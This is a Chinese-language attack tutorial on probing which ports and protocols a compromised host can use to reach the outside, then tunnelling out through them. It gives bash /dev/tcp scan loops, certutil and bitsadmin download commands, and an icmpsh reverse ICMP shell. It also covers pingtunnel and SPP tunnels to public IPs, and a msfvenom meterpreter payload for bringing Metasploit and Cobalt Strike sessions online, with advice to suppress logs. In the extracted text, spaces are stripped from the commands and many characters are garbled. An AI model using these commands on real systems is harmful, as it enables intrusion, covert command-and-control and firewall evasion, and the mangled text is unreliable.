出網(wǎng)探測(cè)是什么

出網(wǎng)探測(cè)

出網(wǎng)探測(cè)就是要探測(cè)出網(wǎng)協(xié)議,出站ip和出站端口。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站協(xié)議。

目標(biāo)禁止出站ip

如果目標(biāo)主機(jī)設(shè)置了嚴(yán)格的策略，防火墻只允許目標(biāo)內(nèi)網(wǎng)機(jī)器主動(dòng)連接公網(wǎng)指定的ip。這樣的話，沒(méi)法反彈shell。（因?yàn)榘酌麊蝘p沒(méi)有辦法拿到權(quán)限）。

禁止出站端口

Linux系統(tǒng)使用Linux系統(tǒng)自帶命令探測(cè)出網(wǎng)端口。( 探測(cè)目標(biāo)機(jī)器可以訪問(wèn)baidu.com對(duì)應(yīng)ip的端口)

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i***********************open************************"||echo"$iclosed";done

webshell不好回顯結(jié)果，將結(jié)果寫(xiě)入文件中

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt

探測(cè)常見(jiàn)端口

foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done

foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt

攻擊端的端口請(qǐng)求記錄

從目標(biāo)發(fā)起的端口訪問(wèn)請(qǐng)求，攻擊端必須得配合記錄，否則即便找到有效的出站端口，我們也無(wú)法獲悉。思路一，單個(gè)逐次監(jiān)聽(tīng)端口。對(duì)于少量端口的探測(cè)，攻擊端很容易記錄。比如，要驗(yàn)證 windows 目標(biāo)的 8088 端口是否為出站端口，先在攻擊端用 nc -n -v -lp 8088 監(jiān)聽(tīng) 8088，指定 -v 選項(xiàng)觀察實(shí)時(shí)訪問(wèn)記錄，再在目標(biāo)上用 telnet 192.168.56.8 8088 連接攻擊端的 8088 端口，最后在攻擊端查看端口訪問(wèn)記錄，若有則該端口是有效出站端口,若無(wú)則重復(fù)以上步驟繼續(xù)驗(yàn)證其他端口。

二，批量捆綁監(jiān)聽(tīng)端口。試想一下，如果能夠把攻擊端的多個(gè)端口流量轉(zhuǎn)發(fā)至單個(gè)匯聚端口，就只需監(jiān)聽(tīng)單個(gè)匯聚端口，目標(biāo)上發(fā)起多個(gè)端口探測(cè)，只要在攻擊端轉(zhuǎn)發(fā)的多個(gè)端口的范圍內(nèi)，那么，一旦找到有效出站端口，攻擊端的匯聚端口一定有訪問(wèn)記錄。說(shuō)到端口轉(zhuǎn)發(fā)，系統(tǒng)自帶的 ssh、iptables，三方的 frp、nps，這些工具都能高效實(shí)現(xiàn)，于是，我從這四個(gè)工具中找尋具備端口捆綁能力的那位 攻擊端這邊需要有?標(biāo)機(jī)訪問(wèn)的記錄，才能更好的判斷?標(biāo)機(jī)器是否訪問(wèn)了我們。只要?標(biāo)機(jī)器訪問(wèn)到 了我們VPS的任意?個(gè)端?，我們這邊都能有記錄。//將所有端?的流量都綁定到34444端?

iptables-APREROUTING-tnat-ptcp--dport1:65535-jREDIRECT--to-port34444

//查看nat表的規(guī)則

iptables-tnat-nvL

//清除nat表所有規(guī)則

iptables-tnat-F

//備份iptables規(guī)則

iptables-save>/tmp/firewall.rules

//恢復(fù)iptables規(guī)則

iptables-restore

	

	配置防?墻規(guī)則，禁?訪問(wèn)遠(yuǎn)程機(jī)器的1-34566和34566-65535端?，也就是說(shuō)只允許訪問(wèn)34567端?然后我們這邊監(jiān)聽(tīng)34444端?，在?標(biāo)機(jī)器端?探測(cè)

	

	禁止出站協(xié)議

	對(duì)于禁止出站協(xié)議的情況，需要探測(cè)目標(biāo)機(jī)器允許哪些協(xié)議出網(wǎng)。

	探測(cè)ICMP協(xié)議服務(wù)端

	監(jiān)聽(tīng)I(yíng)CMP流量：

	
tcpdumpicmp

	

	客戶(hù)端ping VPS地址，查看服務(wù)端能否收到請(qǐng)求VPS監(jiān)聽(tīng)，然后ping我們vps查看能否收到監(jiān)聽(tīng)來(lái)判斷ICMP 協(xié)議是否出?。也可以直接ping?個(gè)地址，看是否 有ttl值。

	探測(cè)DNS協(xié)議

	Windows：

	
nslookup、ping

	

	Linux：

	
nslookup、dig、ping

	

	通過(guò)判斷能否將域名解析為ip，判斷DNS協(xié)議是否出?。也可以將域名換成dnslog的域名，再看dnslog能否收到請(qǐng)求。

	探測(cè)HTTP協(xié)議

	Linux：可以使用curl命令

	
curlhttp://192.168.10.13

	

	Windows系統(tǒng)可以使用如下的命令

	
certutil-urlcache-split-fhttp://www.baidu.com
bitsadmin/transfertesthttp://192.168.10.13/1c:1
powershelliwr-Urihttp://www.baidu.com-OutFile1-UseBasicParsing

	

	只有ICMP協(xié)議出網(wǎng)

	目標(biāo)只有icmp協(xié)議能出?的話，則只有考慮使?icmp協(xié)議來(lái)搭建隧道。利?icmp協(xié)議通信的?具有很多icmpsh、reverse-icmp-shell、PingTunnel、IcmpTunnel都可以。常?的ping命令就是利?的ICMP協(xié)議。

	icmpsh（2016+kali2017）

	icmpsh 是一個(gè)簡(jiǎn)單的反向 ICMP shell，帶有一個(gè) win32 從站和一個(gè) C、Perl 或 Python 中的兼容主站。與其他類(lèi)似的開(kāi)源工具相比，它的主要優(yōu)勢(shì)在于它不需要管理權(quán)限即可在目標(biāo)機(jī)器上運(yùn)行。使用ICMP進(jìn)行命令控制（Icmpsh）適?場(chǎng)景：?標(biāo)機(jī)器是Windows服務(wù)器 Linux服務(wù)器執(zhí)行

	
#關(guān)閉icmp回復(fù),如果要開(kāi)啟icmp回復(fù)，該值設(shè)置為0
sysctl-wnet.ipv4.icmp_echo_ignore_all=1
#運(yùn)?，第?個(gè)IP是VPS的eth0?卡IP(vps上ifconfig可以得到)，第?個(gè)IP是?標(biāo)機(jī)器出?的公?IP
python2icmpsh_m.py192.168.10.8192.168.10.7

	

	目標(biāo)機(jī)器的操作：

	
icmpsh.exe-t192.168.10.8

	

	可以看到已經(jīng)反彈出一個(gè)shell

	ICMP上線CS

	有如下場(chǎng)景，我們拿到了內(nèi)?的機(jī)器權(quán)限。但是機(jī)器對(duì)外均只有icmp協(xié)議出網(wǎng)，我們現(xiàn)在可以利?icmp封裝tcp協(xié)議，讓其上線cs。

	使用SPP

	平常演練常用的一些隧道工具像frp，nps在目標(biāo)出網(wǎng)的情況下還是比較好用的。但是一旦遇到一些比較惡劣的環(huán)境，比如只有icmp可以出網(wǎng)的情況，那就需要使用其他的工具像pingtunnel，ptunnel等。SPP三個(gè)特點(diǎn)：、 支持icmp、kcp、quic 支持雙向的代理 可以自由進(jìn)行內(nèi)部外協(xié)議的組合

	功能：支持的協(xié)議：tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的類(lèi)型：正向代理、反向代理、socks5正向代理、socks5反向代理 協(xié)議和類(lèi)型可以自由組合 外部代理協(xié)議和內(nèi)部轉(zhuǎn)發(fā)協(xié)議可以自由組合 支持shadowsock/s插件，spp-shadowsock/s-plugin，spp-shadowsock/s-plugin-android cs服務(wù)器端

	
./spp-typeserver-protoricmp-listen0.0.0.0

	

	客戶(hù)端

	
spp-name"test"-typeproxy_client-server140.143.167.58-fromaddr:8082-toaddr:8081-proxyprototcp-protoricmp

	

	pingtunnel上線MSF&CS

	1、pingtunnel下載鏈接

	
https://github.com/esrrhs/pingtunnel/releases

	

	注意，在客戶(hù)端中運(yùn)行一定要加noprint nolog兩個(gè)參數(shù)，否則會(huì)生成大量的日志文件；ICMP為網(wǎng)絡(luò)層協(xié)議，應(yīng)用層防火墻無(wú)法識(shí)別，且請(qǐng)求包當(dāng)中的數(shù)據(jù)字段被加密 2 vps服務(wù)端開(kāi)啟

	
##開(kāi)啟服務(wù)器模式
./pingtunnel-typeserver

	

	3、客戶(hù)端開(kāi)啟上傳客戶(hù)端

	
##客戶(hù)端本地監(jiān)聽(tīng)9999端口，將監(jiān)聽(tīng)到的連接通過(guò)icmpserver發(fā)送到Linsten_ip:7777端口
pingtunnel.exe-typeclient-l127.0.0.1:9999-sicmpserver_ip-t82.157.64.237:7778-tcp1-noprint1-nolog1

	

	4、MSF上線

	
msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=9999-fexe-oAAA.exe

	

	5、cs上線 建立監(jiān)聽(tīng)127.0.0.1:9999和192.168.3.76:7777 對(duì)127的監(jiān)聽(tīng)生成木馬AAA.exe，傳到靶機(jī)運(yùn)行

	
pingtunnel.exe-typeclient-l127.0.0.1:9999-s192.168.3.76-t192.168.3.76:7777-tcp1-noprint1-nolog1

	

	

	審核編輯：湯梓紅